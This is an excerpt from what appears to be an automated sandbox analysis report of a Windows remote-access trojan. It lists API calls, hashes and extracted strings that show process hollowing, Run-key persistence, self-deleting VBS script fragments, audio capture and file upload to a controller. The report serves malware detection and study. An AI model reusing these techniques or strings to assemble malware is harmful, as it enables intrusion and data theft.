                                                                                        • Opcode Fuzzy Hash: d098f0494e6cf70b6a27a8e3a9167c03c8027aa06e67c3efe5d1aa02d08667bb
                                                                                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                                        • ResumeThread.KERNEL32(?), ref: 00418435
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                                        • GetLastError.KERNEL32 ref: 0041847A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                        • API String ID: 4188446516-108836778
                                                                                        • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                                                                        • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                                        • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                                                                        • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                                        • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                        • API String ID: 1861856835-332907002
                                                                                        • Opcode ID: 4dd51f9d9474aff828aae78cf0449dadfc192e0bcfa601c76ee246fd980b7321
                                                                                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                                        • Opcode Fuzzy Hash: 4dd51f9d9474aff828aae78cf0449dadfc192e0bcfa601c76ee246fd980b7321
                                                                                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                                        • ExitProcess.KERNEL32 ref: 0040D419
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                                        • API String ID: 3797177996-2557013105
                                                                                        • Opcode ID: be73156ffd57c3f649cc91e4c93651d7f35cc94004796a8fa12775aefd0dfa7f
                                                                                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                                        • Opcode Fuzzy Hash: be73156ffd57c3f649cc91e4c93651d7f35cc94004796a8fa12775aefd0dfa7f
                                                                                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                                                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                                        • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                                        • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
Uniqueness Score: -1.00%

APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
• SetEvent.KERNEL32 ref: 0041B219
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
• CloseHandle.KERNEL32 ref: 0041B23A
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
• WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
• WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
• WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\Public\Libraries\nmfsxfjX.pif,00000001,0040764D,C:\Users\Public\Libraries\nmfsxfjX.pif,00000003,00407675,004752D8,004076CE), ref: 00407284
• GetProcAddress.KERNEL32(00000000), ref: 0040728D
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
• GetProcAddress.KERNEL32(00000000), ref: 004072A5
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
• GetProcAddress.KERNEL32(00000000), ref: 004072B9
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
• GetProcAddress.KERNEL32(00000000), ref: 004072CD
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
• GetProcAddress.KERNEL32(00000000), ref: 004072E1
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
• GetProcAddress.KERNEL32(00000000), ref: 004072F5
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Users\Public\Libraries\nmfsxfjX.pif$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?), ref: 0041C036
• _memcmp.LIBVCRUNTIME ref: 0041C04E
• lstrlenW.KERNEL32(?), ref: 0041C067
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
• lstrcmpW.KERNEL32(?,?), ref: 0041C114
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
• _wcslen.LIBCMT ref: 0041C13B
• FindVolumeClose.KERNEL32(?), ref: 0041C15B
• GetLastError.KERNEL32 ref: 0041C173
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
• lstrcatW.KERNEL32(?,?), ref: 0041C1B9
• lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
• GetLastError.KERNEL32 ref: 0041C1D0
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
Uniqueness Score: -1.00%

APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
• LoadLibraryA.KERNEL32(?), ref: 00414E17
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
• FreeLibrary.KERNEL32(00000000), ref: 00414E3E
• LoadLibraryA.KERNEL32(?), ref: 00414E76
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
• FreeLibrary.KERNEL32(00000000), ref: 00414E8F
• GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
• FreeLibrary.KERNEL32(00000000), ref: 00414EB5
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
• Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
• Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
• Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
• DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
• DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
• DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
• Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
• Sleep.KERNEL32(00000064), ref: 00412E94
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$0TG$0TG$NG$NG
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
• RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEnumOpen
                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                        • API String ID: 1332880857-3714951968
                                                                                        • Opcode ID: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                                                                        • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                                                        • Opcode Fuzzy Hash: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                                                                        • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                                        • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                                        • ExitProcess.KERNEL32 ref: 0041D665
                                                                                        • CreatePopupMenu.USER32 ref: 0041D66B
                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                        • String ID: Close
                                                                                        • API String ID: 1657328048-3535843008
                                                                                        • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                        • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                                        • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                        • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00404E43
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404E4C
                                                                                        • closesocket.WS2_32(FFFFFFFF), ref: 00404E5A
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404E91
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00404EA2
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404EA9
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00404EBA
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404EBF
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404EC4
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00404ED1
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404ED6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 3658366068-263838557
                                                                                        • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                                                                        • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                                        • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                                                                        • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2509303402-0
                                                                                        • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                                                                        • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                                                        • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                                                                        • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                                        • __aulldiv.LIBCMT ref: 00408D4D
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                                        • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                        • API String ID: 3086580692-2582957567
                                                                                        • Opcode ID: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                                                                        • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                                                        • Opcode Fuzzy Hash: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                                                                        • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                                          • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                          • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
